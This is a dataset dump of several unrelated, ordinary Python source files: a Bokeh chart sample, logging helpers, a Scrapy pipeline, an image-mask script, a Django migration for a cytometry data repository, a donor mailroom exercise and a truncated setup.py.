main()\n","sub_path":"eso_pledge_tracker/ept.py","file_name":"ept.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"628238947","text":"from bokeh.plotting import figure, output_file, show\n\noutput_file(\"demo.html\")\n\nx = [1,2,3,4,5]\ny = [5,6,7,8,9]\n\np = figure(plot_width=400, plot_height=400, title='DottedLine Chart Example')\n\np.line(x,y,line_width=2)\n\np.circle(x,y, fill_color='orange', size=6)\n\nshow(p)","sub_path":"Bokeh/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"527444727","text":"import ujson as json\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nimport logging\nfrom tqdm import tqdm\nimport os\n\ndef save(filename, obj):\n \"\"\"\n just saves the file, nothing fancy\n author: @wzhouad\n \"\"\"\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\ndef quick_clean(raw_str):\n \"\"\"\n args:\n - raw_str: a string to be quickly cleaned\n\n return\n - the original string w/ all quotes replaced as double quotes\n \"\"\"\n return raw_str.replace(\"''\", '\" ').replace(\"``\", '\" ')\n\ndef get_logger(log_dir, name):\n \"\"\"\n from @chrischute\n\n Get a `logging.Logger` instance that prints to the console\n and an auxiliary file.\n\n Args:\n log_dir (str): Directory in which to create the log file.\n name (str): Name to identify the logs.\n\n Returns:\n logger (logging.Logger): Logger instance for logging events.\n \"\"\"\n class StreamHandlerWithTQDM(logging.Handler):\n \"\"\"Let `logging` print without breaking `tqdm` progress bars.\n\n See Also:\n > https://stackoverflow.com/questions/38543506\n \"\"\"\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n # Create logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # Log everything (i.e., DEBUG level and above) to a file\n log_path = os.path.join(log_dir, 'log.txt')\n file_handler = logging.FileHandler(log_path)\n file_handler.setLevel(logging.DEBUG)\n\n # Log everything except DEBUG level (i.e., INFO level and above) to console\n console_handler = StreamHandlerWithTQDM()\n console_handler.setLevel(logging.INFO)\n\n # Create format for the logs\n file_formatter = logging.Formatter('[%(asctime)s] %(message)s',\n datefmt='%m.%d.%y %H:%M:%S')\n file_handler.setFormatter(file_formatter)\n console_formatter = logging.Formatter('[%(asctime)s] %(message)s',\n datefmt='%m.%d.%y %H:%M:%S')\n console_handler.setFormatter(console_formatter)\n\n # add the handlers to the logger\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n return logger","sub_path":"exp-2-smol/toolkit.py","file_name":"toolkit.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266242161","text":"from crawler import data_utils\nfrom clusterizator.models import Page\n\n\nclass SpiderPipeline(object):\n NAME_XPATH = 'name()'\n CHILDREN_XPATH = 'child::*'\n RESULT = '{} byt{} of data'\n\n def _get_node_name(self, node):\n return node.xpath(self.NAME_XPATH).extract_first()\n\n def _get_node_children(self, node):\n return node.xpath(self.CHILDREN_XPATH)\n\n def get_node(self, node):\n return [\n self._get_node_name(node),\n [self.get_node(c) for c in self._get_node_children(node)]\n ]\n\n def process_item(self, item, spider):\n url = item[spider.URL_KEY]\n node = self.get_node(item[spider.ROOT_NODE_KEY])\n site_id = spider.site_id\n data = data_utils.encode(node)\n data_size = len(data)\n if not url.endswith(u'/'):\n url += u'/'\n Page.objects.get_or_create(\n url=url,\n site_id=site_id,\n data=data,\n data_size=data_size\n )\n return self.RESULT.format(\n data_size,\n 'e' if data_size == 1 else 'es'\n )\n","sub_path":"source/crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"398504324","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport numpy as np\nimport argparse\n\ndef run(args):\n\n csv_path = args.csv\n\n csv = pd.read_csv(csv_path)\n model_foldername = os.path.split(csv_path)[1][0:-4]\n print('Generatin masks for ' + model_foldername)\n IMAGES_PATH = '/home/wences/Documents/src/images/images/'\n PROJECTIONS_PATH = os.path.join('.', 'output', model_foldername, 'projections/')\n MASKS_PATH = os.path.join('.','output', model_foldername, 'masks/')\n ARRAYS_PATH = os.path.join('.','output', model_foldername, 'vote_arrays/')\n BINARY_MASK_PATH = os.path.join('.','output', model_foldername, 'binary_masks/')\n for directory in [PROJECTIONS_PATH, MASKS_PATH, ARRAYS_PATH, BINARY_MASK_PATH]:\n os.makedirs(directory)\n\n positive_patches = csv.loc[csv['svm_result'] > 0.5,:]\n\n list_positive_images = positive_patches['image_name'].unique()\n\n #for image_name in list_positive_images:\n # patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n # img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n # for idx, row in patches_from_image.iterrows():\n # cv2.rectangle(img,(row['top_left_corner_y'],row['top_left_corner_x']),(row['top_left_corner_y']+300,row['top_left_corner_x']+300),(0,255,0),int(row['svm_result']*35))\n # cv2.imwrite(PROJECTIONS_PATH + 'sw_'+ image_name, img)\n\n for image_name in list_positive_images:\n patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n mask = np.zeros_like(img[:,:,0])\n for idx, row in patches_from_image.iterrows():\n x = row['top_left_corner_x']\n y = row['top_left_corner_y']\n mask[x:x+300,y:y+300] += 1\n #cv2.rectangle(img,(row['top_left_corner_x'],row['top_left_corner_y']),(row['top_left_corner_x']+300,row['top_left_corner_y']+300),(0,255,0),20)\n cv2.imwrite(MASKS_PATH + 'mask_sw_'+ image_name, cv2.normalize(mask,None,0,255,cv2.NORM_MINMAX))\n\n for image_name in list_positive_images:\n patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n mask = np.zeros_like(img[:,:,0])\n for idx, row in patches_from_image.iterrows():\n x = row['top_left_corner_x']\n y = row['top_left_corner_y']\n mask[x:x+300,y:y+300] += 1\n np.save(ARRAYS_PATH + 'mask_sw_'+ image_name[0:4]+'.npy', mask)\n\n npy_mask = os.listdir(ARRAYS_PATH)\n npy_mask = sorted(npy_mask)\n\n for npy_array in npy_mask:\n mask = np.load(ARRAYS_PATH + npy_array)\n mask[mask<3] = 0\n mask = np.uint8(mask.astype(bool))\n cv2.imwrite(BINARY_MASK_PATH + 'bin_' + npy_array[0:-4] + '.jpg', mask)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Run resulting mask generation for sliding windows detection csv report on bud images\")\n parser.add_argument(\"-csv\", help=\"csv containing the report generated by main.py\",\n dest=\"csv\", type=str, required=True)\n\n parser.set_defaults(func=run)\n\n args = parser.parse_args()\n\n if (not os.path.exists(args.csv)):\n parser.error('Invalid path to csv')\n \n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"generate_masks.py","file_name":"generate_masks.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325117270","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport repository.models\nimport django.db.models.deletion\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BeadSample',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('acquisition_date', models.DateField()),\n ('includes_negative_control', models.BooleanField(default=False)),\n ('negative_control', models.BooleanField(default=False)),\n ('bead_file', models.FileField(max_length=256, upload_to=repository.models.bead_file_path)),\n ('original_filename', models.CharField(max_length=256, editable=False)),\n ('subsample', models.FileField(max_length=256, upload_to=repository.models.bead_subsample_file_path)),\n ('sha1', models.CharField(max_length=40, editable=False)),\n ('upload_date', models.DateTimeField(editable=False)),\n ('exclude', models.BooleanField(default=False)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BeadSampleMetadata',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=256)),\n ('value', models.CharField(max_length=2048)),\n ('bead_sample', models.ForeignKey(to='repository.BeadSample')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Compensation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256)),\n ('compensation_file', models.FileField(max_length=256, upload_to=repository.models.compensation_file_path)),\n ('matrix_text', models.TextField()),\n ('acquisition_date', models.DateField()),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Cytometer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cytometer_name', models.CharField(max_length=128)),\n ('serial_number', models.CharField(max_length=256)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='beadsample',\n name='cytometer',\n field=models.ForeignKey(to='repository.Cytometer'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Fluorochrome',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fluorochrome_abbreviation', models.CharField(unique=True, max_length=32)),\n ('fluorochrome_name', models.CharField(unique=True, max_length=128)),\n ('fluorochrome_description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'fluorochrome_abbreviation'],\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='beadsample',\n name='compensation_channel',\n field=models.ForeignKey(to='repository.Fluorochrome', null=True),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Marker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker_abbreviation', models.CharField(unique=True, max_length=32)),\n ('marker_name', models.CharField(unique=True, max_length=128)),\n ('marker_description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'marker_abbreviation'],\n 'verbose_name_plural': b'Markers',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequest',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=128)),\n ('predefined', models.CharField(blank=True, max_length=64, null=True, choices=[(b'1', b'Subsampled, asinh, HDP'), (b'2', b'Subsampled, logicle, HDP')])),\n ('request_date', models.DateTimeField(auto_now_add=True)),\n ('assignment_date', models.DateTimeField(null=True, blank=True)),\n ('completion_date', models.DateTimeField(null=True, editable=False, blank=True)),\n ('status', models.CharField(max_length=32, choices=[(b'Pending', b'Pending'), (b'Working', b'Working'), (b'Error', b'Error'), (b'Completed', b'Completed')])),\n ('request_user', models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequestInput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=1024)),\n ('process_request', models.ForeignKey(to='repository.ProcessRequest')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequestOutput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=1024)),\n ('value', models.FileField(max_length=256, upload_to=repository.models.pr_output_path)),\n ('process_request', models.ForeignKey(to='repository.ProcessRequest')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project_name', models.CharField(unique=True, max_length=128, verbose_name=b'Project Name')),\n ('project_desc', models.TextField(help_text=b'A short description of the project', null=True, verbose_name=b'Project Description', blank=True)),\n ],\n options={\n 'permissions': ((b'view_project_data', b'View Project Data'), (b'add_project_data', b'Add Project Data'), (b'modify_project_data', b'Modify/Delete Project Data'), (b'submit_process_requests', b'Submit Process Requests'), (b'manage_project_users', b'Manage Project Users')),\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='project',\n field=models.ForeignKey(to='repository.Project'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='ProjectPanel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('panel_name', models.CharField(max_length=128)),\n ('panel_description', models.TextField(help_text=b'A short description of the panel', null=True, verbose_name=b'Panel Description', blank=True)),\n ('staining', models.CharField(max_length=2, choices=[(b'FS', b'Full Stain'), (b'US', b'Unstained'), (b'FM', b'Fluorescence Minus One'), (b'IS', b'Isotype Control'), (b'CB', b'Compensation Bead')])),\n ('parent_panel', models.ForeignKey(blank=True, to='repository.ProjectPanel', null=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProjectPanelParameter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('parameter_type', models.CharField(max_length=3, choices=[(b'FSC', b'Forward Scatter'), (b'SSC', b'Side Scatter'), (b'FCM', b'Fluorochrome Conjugated Marker'), (b'UNS', b'Unstained'), (b'ISO', b'Isotype Control'), (b'EXC', b'Exclusion'), (b'VIA', b'Viability'), (b'ICM', b'Isotope Conjugated Marker'), (b'TIM', b'Time'), (b'BEA', b'Bead'), (b'NUL', b'Null')])),\n ('parameter_value_type', models.CharField(blank=True, max_length=1, null=True, choices=[(b'H', b'Height'), (b'W', b'Width'), (b'A', b'Area'), (b'T', b'Time')])),\n ('fluorochrome', models.ForeignKey(blank=True, to='repository.Fluorochrome', null=True)),\n ('project_panel', models.ForeignKey(to='repository.ProjectPanel')),\n ],\n options={\n 'ordering': [b'parameter_type', b'parameter_value_type'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProjectPanelParameterMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker', models.ForeignKey(to='repository.Marker')),\n ('project_panel_parameter', models.ForeignKey(to='repository.ProjectPanelParameter')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Sample',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pretreatment', models.CharField(max_length=32, choices=[(b'In vitro', b'In vitro'), (b'Ex vivo', b'Ex vivo')])),\n ('storage', models.CharField(max_length=32, choices=[(b'Fresh', b'Fresh'), (b'Cryopreserved', b'Cryopreserved')])),\n ('acquisition_date', models.DateField()),\n ('sample_file', models.FileField(max_length=256, upload_to=repository.models.fcs_file_path)),\n ('original_filename', models.CharField(max_length=256, editable=False)),\n ('subsample', models.FileField(max_length=256, upload_to=repository.models.subsample_file_path)),\n ('sha1', models.CharField(max_length=40, editable=False)),\n ('upload_date', models.DateTimeField(editable=False)),\n ('exclude', models.BooleanField(default=False)),\n ('compensation', models.ForeignKey(blank=True, to='repository.Compensation', null=True)),\n ('cytometer', models.ForeignKey(to='repository.Cytometer')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SampleCollection',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='sample_collection',\n field=models.ForeignKey(editable=False, to='repository.SampleCollection'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SampleCollectionMember',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('sample', models.ForeignKey(to='repository.Sample', on_delete=django.db.models.deletion.SET_NULL, null=True)),\n ('sample_collection', models.ForeignKey(to='repository.SampleCollection')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='samplecollectionmember',\n unique_together=set([(b'sample_collection', b'sample')]),\n ),\n migrations.CreateModel(\n name='SampleMetadata',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=256)),\n ('value', models.CharField(max_length=2048)),\n ('sample', models.ForeignKey(to='repository.Sample')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Site',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('site_name', models.CharField(max_length=128)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'permissions': ((b'view_site_data', b'View Site'), (b'add_site_data', b'Add Site Data'), (b'modify_site_data', b'Modify/Delete Site Data')),\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='cytometer',\n name='site',\n field=models.ForeignKey(to='repository.Site'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SitePanel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('implementation', models.IntegerField(editable=False)),\n ('site_panel_comments', models.TextField(help_text=b'A short description of the site panel', null=True, verbose_name=b'Site Panel Comments', blank=True)),\n ('project_panel', models.ForeignKey(to='repository.ProjectPanel')),\n ('site', models.ForeignKey(to='repository.Site')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='compensation',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='beadsample',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SitePanelParameter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('parameter_type', models.CharField(max_length=3, choices=[(b'FSC', b'Forward Scatter'), (b'SSC', b'Side Scatter'), (b'FCM', b'Fluorochrome Conjugated Marker'), (b'UNS', b'Unstained'), (b'ISO', b'Isotype Control'), (b'EXC', b'Exclusion'), (b'VIA', b'Viability'), (b'ICM', b'Isotope Conjugated Marker'), (b'TIM', b'Time'), (b'BEA', b'Bead'), (b'NUL', b'Null')])),\n ('parameter_value_type', models.CharField(max_length=1, choices=[(b'H', b'Height'), (b'W', b'Width'), (b'A', b'Area'), (b'T', b'Time')])),\n ('fcs_text', models.CharField(max_length=32, verbose_name=b'FCS Text')),\n ('fcs_opt_text', models.CharField(max_length=32, null=True, verbose_name=b'FCS Optional Text', blank=True)),\n ('fcs_number', models.IntegerField()),\n ('fluorochrome', models.ForeignKey(blank=True, to='repository.Fluorochrome', null=True)),\n ('site_panel', models.ForeignKey(to='repository.SitePanel')),\n ],\n options={\n 'ordering': [b'fcs_number'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SitePanelParameterMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker', models.ForeignKey(to='repository.Marker')),\n ('site_panel_parameter', models.ForeignKey(to='repository.SitePanelParameter')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Specimen',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('specimen_name', models.CharField(unique=True, max_length=32)),\n ('specimen_description', models.CharField(unique=True, max_length=256)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='specimen',\n field=models.ForeignKey(to='repository.Specimen'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Stimulation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('stimulation_name', models.CharField(max_length=128)),\n ('stimulation_description', models.TextField(null=True, blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='stimulation',\n field=models.ForeignKey(to='repository.Stimulation'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Subject',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject_code', models.CharField(max_length=128, verbose_name=b'Subject Code')),\n ('batch_control', models.BooleanField(default=False)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='subject',\n field=models.ForeignKey(to='repository.Subject'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SubjectGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('group_name', models.CharField(max_length=128)),\n ('group_description', models.TextField(null=True, blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='subject',\n name='subject_group',\n field=models.ForeignKey(blank=True, to='repository.SubjectGroup', null=True),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='subjectgroup',\n unique_together=set([(b'project', b'group_name')]),\n ),\n migrations.CreateModel(\n name='SubprocessCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'name'],\n 'verbose_name_plural': b'Sub-process Categories',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SubprocessImplementation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ('category', models.ForeignKey(to='repository.SubprocessCategory')),\n ],\n options={\n 'ordering': [b'category', b'name'],\n 'verbose_name_plural': b'Sub-process Implementation',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SubprocessInput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ('value_type', models.CharField(max_length=64, choices=[(b'Boolean', b'Boolean'), (b'Integer', b'Integer'), (b'PositiveInteger', b'Positive Integer'), (b'Decimal', b'Decimal'), (b'String', b'String'), (b'Date', b'Date')])),\n ('required', models.BooleanField(default=False)),\n ('allow_multiple', models.BooleanField(default=False)),\n ('default', models.CharField(max_length=1024, null=True, blank=True)),\n ('implementation', models.ForeignKey(to='repository.SubprocessImplementation')),\n ],\n options={\n 'ordering': [b'implementation', b'name'],\n 'verbose_name_plural': b'Sub-process Input',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequestinput',\n name='subprocess_input',\n field=models.ForeignKey(to='repository.SubprocessInput'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='VisitType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('visit_type_name', models.CharField(max_length=128)),\n ('visit_type_description', models.TextField(null=True, blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='visit',\n field=models.ForeignKey(to='repository.VisitType'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Worker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('worker_name', models.CharField(unique=True, max_length=128, verbose_name=b'Worker Name')),\n ('worker_hostname', models.CharField(max_length=256, verbose_name=b'Worker Hostname')),\n ('user', models.OneToOneField(editable=False, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='worker',\n field=models.ForeignKey(blank=True, to='repository.Worker', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"repository/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":24982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294034630","text":"#!/usr/bin/env python3\n\n# Global tuple containing donor list and donation amounts\ndonor_list = [[\"Harry Potter\", [10000, 5000, 500.55]], [\"Ronald Weasley\", [2499.99, 7500.01]], [\"Hermione Granger\", [100, 2000, 30000]], [\"Draco Malfoy\", [10, 888.88]], [\"Neville Longbottom\", [10]]]\n\n# Email template for Thank You message\nemail = \"\"\"Dear {},\\n\\nThank you for your generous donation of ${}.\\n\\nSincerely,\\nHogwarts School of Witchcraft and Wizardry\"\"\"\n\n\ndef send_thankyou():\n \"\"\"\n * If the user (you) selects ‘Send a Thank You’, prompt for a Full Name.\n * If the user types ‘list’, show them a list of the donor names and re-prompt\n * If the user types a name not in the list, add that name to the data structure and use it.\n * If the user types a name in the list, use it.\n * Once a name has been selected, prompt for a donation amount.\n * Turn the amount into a number – it is OK at this point for the program to crash if someone types a bogus amount.\n * Once an amount has been given, add that amount to the donation history of the selected user.\n * Finally, use string formatting to compose an email thanking the donor for their generous donation. Print the email to the terminal and return to the original prompt.\n\n Args: None\n \"\"\"\n donor_name = input(\"Please enter the full name of a donor. You can also enter list to see all current donors or e to exit: \")\n if donor_name == \"e\":\n return\n\n while donor_name == \"list\":\n for donor in donor_list:\n print (donor[0])\n donor_name = input(\"Please enter the full name of a donor. You can also enter list to see all current donors or e to exit: \")\n\n for donor in donor_list:\n if donor_name == donor[0]:\n donor_found = 0\n break\n elif donor_name == \"e\":\n return\n else:\n donor_found = 1\n\n if donor_found == 0:\n donation_amount = input(\"Please enter the donation amount or e to exit: \")\n if donation_amount == \"e\":\n return\n donor[1].append(float(donation_amount))\n print(email.format(donor_name, donation_amount))\n else:\n donation_amount = input(\"Please enter the donation amount or e to exit: \")\n if donation_amount == \"e\":\n return\n donor_list.append([donor_name, [float(donation_amount)]])\n print(email.format(donor_name, donation_amount))\n\n\ndef create_report():\n \"\"\"\n * If the user (you) selected “Create a Report”, print a list of your donors, sorted by total historical donation amount.\n * Include Donor Name, total donated, number of donations and average donation amount as values in each row. You do not need to print out all their donations, just the summary info.\n * Using string formatting, format the output rows as nicely as possible. The end result should be tabular (values in each column should align with those above and below)\n * After printing this report, return to the original prompt.\n\n Args: None\n \"\"\"\n print (\"{:30s} | {:11s} | {:9s} | {:12s}\".format(\"Donor Name\", \"Total Given\", \"Num Gifts\", \"Average Gift\"))\n print (\"-\" * 71)\n\n donor_list.sort(key=lambda i: sum(i[1]), reverse=True)\n \n for donor in donor_list:\n donor_name = donor[0]\n total_given = sum(donor[1])\n num_gifts = len(donor[1])\n average_gift = (total_given / num_gifts)\n print (\"{:30s} ${:11.2f} {:9d} ${:12.2f}\".format(donor_name, total_given, num_gifts, average_gift))\n\n\ndef user_option():\n \"\"\"\n Prompt the user (you) to choose from a menu of 3 actions: “Send a Thank You”, “Create a Report” or “quit”)\n\n Args: None\n \"\"\"\n quit = 1\n while quit:\n option = input(\"Please select an option:\\nc: Create a Report\\ns: Send a Thank You Letter\\nq: Quit\\n: \")\n if option == \"c\":\n create_report()\n elif option == \"s\":\n send_thankyou()\n elif option == \"q\":\n print (\"Bye!\")\n quit = 0\n else:\n print (\"Try again\")\n\nif __name__ == '__main__': \n user_option()","sub_path":"students/prgrover/lesson03/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"436849558","text":"#!/usr/bin/env python\n#\n# http://www.bionicbunny.org/\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nfrom bootstrap import use_setuptools\n\nimport os\nimport setuptools\nimport sys\n\n\nPY_SRC_DIR = os.path.join(\"src\", \"main\", \"python\")\n\n\nsys.path.append(PY_SRC_DIR)\nif sys.version_info <= (2, 4):\n print(\"b3 requires Python version 2.5 or above.\", file=sys.stderr)\n sys.exit(1)\n\n\ndef main():\n setuptools.setup(name=\"b3\",\n version=__import__(\"b3\").__version__,\n url=\"http://github.com/robionica/b3\",\n author=\"Oleksandr Sviridenko\",\n author_email=\"info@bionicbunny.org\",\n description=\"Bionic Bunny Build 